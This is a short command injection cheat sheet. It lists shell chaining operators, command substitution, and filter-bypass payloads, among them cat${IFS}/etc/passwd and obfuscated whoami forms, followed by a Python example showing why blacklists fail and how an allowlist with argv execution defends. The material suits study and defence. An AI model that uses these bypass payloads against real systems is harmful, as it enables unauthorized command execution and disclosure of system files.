Command Injection

Chaining and Invoking

;    # Executes one command and then another
&    # Executes a command in the background, followed by the other one
|    # Pipes the output of the first command into the second command as input
&&   # Executes the second command if the first command succeeds
||   # Executes the second command if the first command fails

It's also possible to inject commands via command substitution, where the output of a command is captured and used in another context:

$(command)    # Both Windows and Linux systems
`command`     # Only Linux systems

Bypasses

Space Bypass

Use the Internal Field Separator variable $IFS in place of spaces in a command:

cat${IFS}/etc/passwd

Blacklisted Words

# Quotes
w'h'o'a'm'i'     # Both Windows and Linux systems
'w'h'o'a'm'i     # Only Linux systems
wh''oami         # Both Windows and Linux systems

# Backslashes
\w\h\o\a\m\i     # Only Linux systems
w\h\o\a\m\i      # Only Linux systems

# $()
wh$()oami        # Only Linux systems
wh$(echo oa)mi   # Only Linux systems

# ``
wh``oami         # Only Linux systems
wh`echo oa`mi    # Only Linux systems

# $@
wh$@oami         # Only Linux systems
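
Why the space and word filters bypassed above do not hold, and what does, as an added example that is not part of the original page. The blacklist, the ping use case and all function names are assumptions made for illustration.

```python
import re
import shlex

# Constructed samples: the obfuscated forms listed in the Bypasses section.
QUOTE_FORMS = ["w'h'o'a'm'i'", "'w'h'o'a'm'i", "wh''oami",
               r"\w\h\o\a\m\i", r"w\h\o\a\m\i"]
EXPANSION_FORMS = ["wh$()oami", "wh$(echo oa)mi", "wh``oami",
                   "wh`echo oa`mi", "wh$@oami", "cat${IFS}/etc/passwd"]

BLOCKED = (" ", "whoami")  # hypothetical blacklist: spaces and one word


def blacklist_allows(value):
    """Naive filter: substring match against the raw input."""
    return not any(item in value for item in BLOCKED)


def after_quote_removal(value):
    """Approximate what a POSIX shell sees after quote/backslash removal.
    shlex does not perform $(), backtick, $@ or $IFS expansion."""
    return " ".join(shlex.split(value, posix=True))


# Allowlist for the one value the application expects (assumed: a hostname).
HOST_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?")


def is_valid_host(value):
    return HOST_RE.fullmatch(value) is not None


def ping_argv(host):
    """Argument vector for subprocess.run(argv), i.e. without shell=True,
    so the value is passed as data and never parsed by a shell."""
    if not is_valid_host(host):
        raise ValueError("host rejected by allowlist")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    for sample in QUOTE_FORMS + EXPANSION_FORMS:
        print(f"{sample!r:26} blacklist_allows={blacklist_allows(sample)!s:5} "
              f"allowlist={is_valid_host(sample)}")
```

The raw-string filter passes every quote and backslash form because the shell only rejoins the word after the filter has run; the allowlist rejects all of them because none is a valid hostname.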

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
https://book.hacktricks.xyz/pentesting-web/command-injection
